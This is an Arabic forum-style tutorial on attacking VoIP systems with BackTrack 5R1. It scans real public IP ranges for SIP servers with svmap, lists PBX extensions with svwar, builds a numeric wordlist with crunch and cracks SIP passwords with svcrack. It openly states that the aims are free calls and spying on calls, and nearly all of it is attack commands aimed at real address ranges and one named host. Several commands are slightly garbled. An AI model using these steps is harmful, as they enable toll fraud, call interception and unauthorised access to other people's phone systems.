السلام عليكم ورحمة الله وبركاته
سأشرح اليوم بحول الله طريقة الحصول على آيبيات إتصال sip في تقنية voip وكيفية الحصول على اليوزرات والباسوردات ب Backtrack 5R1 وذلك لإجراء مكالمات مجانية أو التجسس على المكالمات إلخ ...
أولا نقوم بفتح الترمينال ونكتب
اقتباس:
كود HTML:
root@root:~# cd /pentest/voip/sipvicious
ثم بعد ذلك سنقوم بعمل سكان على رنج آيبي لجلب بعض الآيبيات المصابة بإستخدام أداة svmap
اقتباس:
كود HTML:
root@root:~# /pentest/voip/sipvicious/svmap.py 190.145.50.0/24
أخي الكريم في حالة لم تحصل على أي آيبي مصاب في هذا الرنج يمكنك تغيير الرنج آيبي
190.145.0.0/24
196.123.74.0/16
إلى نحو ذلك
الآن إخواني سنقوم بإستخراج بعض ايوزرات أو أرقام التحويل المخزنة في PBX
سنستخدم أداة svwar
اقتباس:
كود HTML:
root@root:~# cd /pentest/voip/sipvicious/ ./svwar.py 190.145.50.189 -m Invite
كما ترون في الصورة تم إستخراج بعض اليوزرات
ملاحضة : لمشاهدة كيف تحصل عملية إستخراج اليوزرات يمكنك أخي إضافة - vv
اقتباس:
كود HTML:
root@root:~# /pentest/voip/sipvicious/ ./svwar.py 190.145.50.189 -m Invite - vv
الآن سنقوم بعمل قائمة باسوردات بإستخدام أداة crunch
نقوم بفتح ترمينال أخر ونكتب
اقتباس:
كود HTML:
root@root:~# cd /pentest/passwords/crunch
أأخي لمشاهدة كيف تعمل الأداة يمكنك كتابة
اقتباس:
كود HTML:
root@root:~# /pentest/passwords/crunch# man crunch
هنا سنسقوم بعمل قائمة باسورد تتكون من أرقام من 1 إلى 999999 لأنو الحقيقة في الغالب تكون الباسوردات أرقام
قبل ذلك نقوم بعمل ملف جديد لوضع الباسوردات فيه نفتح ترمينال آخر ونكتب
اقتباس
كود HTML:
root@root:~# cd /pentest/voip/sipvicious
كود HTML:
root@root:~# /pentest/voip/sipvicious# *> gaza.txt
الآن نقوم بعمل قائمة باسوردات بأداة crunch
اقتباس:
كود HTML:
root@root:~# /pentest/passwords/crunch# ./crunch 1 6 -f charset.lst numeric -o /pentest/voip/sipvicious/gaza.txt
الآن بعد إنشاء قائمة الباسوردات نأتي إلى مرحلة الكراك
سنستخدم أخي الكريم أداة svrack
نكتب أخي كالآتي
اقتباس:
كود HTML:
root@root:~# /pentest/voip/sipvicious# svcrack -u231 -w gaza.txt 190.145.50.189
كما ترون إخواني تم الحصول على الباسورد ، وليس دائما يكون اليوزر مثل الباسورد أحيان تكون الباسورد حروف ..
